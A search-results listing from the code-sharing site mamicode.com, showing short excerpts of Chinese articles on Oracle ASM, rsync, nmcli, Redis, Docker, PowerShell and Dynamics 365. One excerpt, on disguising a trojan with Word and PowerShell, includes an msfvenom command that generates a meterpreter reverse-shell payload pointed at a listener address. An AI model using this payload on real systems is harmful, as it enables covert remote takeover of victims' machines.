码迷,mamicode.com
首页 >  
搜索关键字:power network    ( 14611个结果
测试 19c asm flex 的 功能:
测试 19c asm flex 的 功能: 在节点1上面执行 srvctl stop asm -node test-rac19c-01 -stopoption abort -force 报错 因为 ora.asm_listener.type 是asm监听的主节点,节点1为主节点,主节点无法关闭 [g ...
分类:其他好文   时间:2021-04-02 13:07:21    阅读次数:0
rsync服务
rsync服务介绍 属于一款实现全量及增量复制同步的软件工具 rsync命令简单应用 rsync==cp [root@backup ~]# rsync /etc/sysconfig/network /tmp/ [root@backup ~]# tree /tmp/tmp├── network└── ...
分类:其他好文   时间:2021-04-01 13:31:53    阅读次数:0
COMP3322 BModern Technologies
COMP3322 BModern Technologies on World Wide WebAssignment TwoTotal 10 pointsDeadline: Mar 29, 2021 23:59OverviewYou are going to design and develop a ...
分类:其他好文   时间:2021-04-01 13:12:04    阅读次数:0
放弃ipup系列,开始使用更先进的nmcli来管理你的网络
背景 在CentOS的新版本中加入了nmcli来便于管理网络,但网上看到的更多的评论还都是摒弃这个,还继续使用传统的修改/etc/sysconfig/network-scripts/ifcfg-* 的方式来做网络配置。但这个太费时间了,还是用nmcli来管理网络吧。 nmcli简介 nmcli 是N ...
分类:其他好文   时间:2021-03-31 12:29:44    阅读次数:0
Linux上设置redis的开启自启动的方法(适用于centos 7及以上版本)
网上很多帖子有在Linux上安装Redis的分享,这里我就不再多介绍。 redis在centos7中的开机自启在系统服务目录里创建redis.service文件 vi /etc/systemd/system/redis.service 写入以下内容:[Unit]Description=redis-s ...
分类:系统相关   时间:2021-03-31 12:13:38    阅读次数:0
dockerSearch命令报错解决方案
dockerSearch命令 Get https://index.docker.io/v1/search?q=redis&n=25: dial tcp: lookup index.docker.io on [::1]:53: read udp [::1]:49555->[::1]:53: read:... ...
分类:其他好文   时间:2021-03-31 12:10:21    阅读次数:0
linux出现双ip,ip自动变更解决方案
linux出现双ip,ip自动变更解决方案 1.输入命令vim /etc/sysconfig/network/network-scripts/ifcfg-ens33 修改BOOTPROTO=static 2.重启网络 ...
分类:系统相关   时间:2021-03-30 13:27:32    阅读次数:0
关于powershell 的一些基本使用
#获取当前目录下的所有.proto 的文件信息 ls *.proto -r | % versioninfo #将当前文件夹下的 proto 文件复制到c盘的proto 文件夹 Copy-Item .\*\*.proto C:\proto -Recurse ...
分类:系统相关   时间:2021-03-26 15:22:26    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
Integration between Dynamics 365 and Dynamics 365 Finance and Operation - Power Platform
With digital transformation permeating every industry, organizations are driving efforts to accelerate business outcomes, and achieve greater efficien ...
分类:其他好文   时间:2021-03-18 14:04:58    阅读次数:0
14611条   上一页 1 ... 11 12 13 14 15 ... 1462 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!